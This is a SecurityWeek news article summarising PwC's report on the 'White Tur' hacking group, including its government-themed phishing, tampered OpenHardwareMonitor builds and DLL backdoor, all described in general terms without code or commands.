Security Experts:

Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

‘White Tur’ Hacking Group Borrows Techniques From Multiple APTs

A newly detailed threat actor has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors, PwC’s cyber threat intelligence team reports.

A newly detailed threat actor has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors, PwC’s cyber threat intelligence team reports.

Dubbed White Tur, the adversary hasn’t been attributed to a specific geography, although it appears to have been active since at least 2017.

As part of an attack identified in January 2021, the group registered the subdomain mail[.]mod[.]qov[.]rs to phish for the login credentials of Serbian Ministry of Defence employees.

The phishing domain had a TLS certificate using the term ‘qov’, which spoofs the word ‘gov’. The .gov spoofing technique was previously employed by APT actors such as Russia-linked Sofacy (also known as APT28).

The adversary was also observed abusing the open source project OpenHardwareMonitor for payload execution. For that, it injected code into the legitimate tool, using a technique previously employed by North Korea-based threat actor ZINC.

“As part of the attack, PowerShell code retrieves environmental information from the victim using PowerShell WMI objects and utilises the BitsTransfer Module available in PowerShell to download a payload,” PwC says.

White Tur’s portfolio also includes macro-enabled documents containing various exploits and governmental, defense, R&D, and telecoms themes; HTA and XSL scripts; PowerShell scripts; and a Jscript backdoor.

The threat actor was also observed employing a backdoor packaged as a DLL, which allows it to manage files, upload and download files, execute commands, and set malware sleep time. This, PwC says, is “the most functional backdoor” in White Tur’s arsenal.

In the backdoor’s PDB path, the researchers also found the name Storm Kitty, which is an open-source malware project designed to capture credentials and log keystrokes.

PwC says attributing the activity of White Tur to a specific adversary is difficult because the target region doesn’t have much coverage in threat intelligence blogs: “from our assessment, this particular threat actor has a range of motivations with no clear links to well-known threat actors which are attributed to a government or organisation.”

Related: Sophisticated Threat Actor Targets Governments, Defense Industry in Western Asia

Related: Russian Cyberspy Groups Start Exploiting Log4Shell Vulnerability

Related: North Korean Hackers Abuse Windows Update Client in Attacks on Defense Industry

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Expert Insights

Related Content

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Cyberwarfare

Websites of German airports, administration bodies and banks were hit by DDoS attacks attributed to Russian hacker group Killnet

Cybercrime

The FBI dismantled the network of the prolific Hive ransomware gang and seized infrastructure in Los Angeles that was used for the operation.

Cybercrime

A new study by McAfee and the Center for Strategic and International Studies (CSIS) named a staggering figure as the true annual cost of...

Cyberwarfare

Iranian APT Moses Staff is leaking data stolen from Saudi Arabia government ministries under the recently created Abraham's Ax persona

Cybercrime

Video games developer Riot Games says source code was stolen from its development environment in a ransomware attack

Cybercrime

CISA, NSA, and MS-ISAC issued an alert on the malicious use of RMM software to steal money from bank accounts.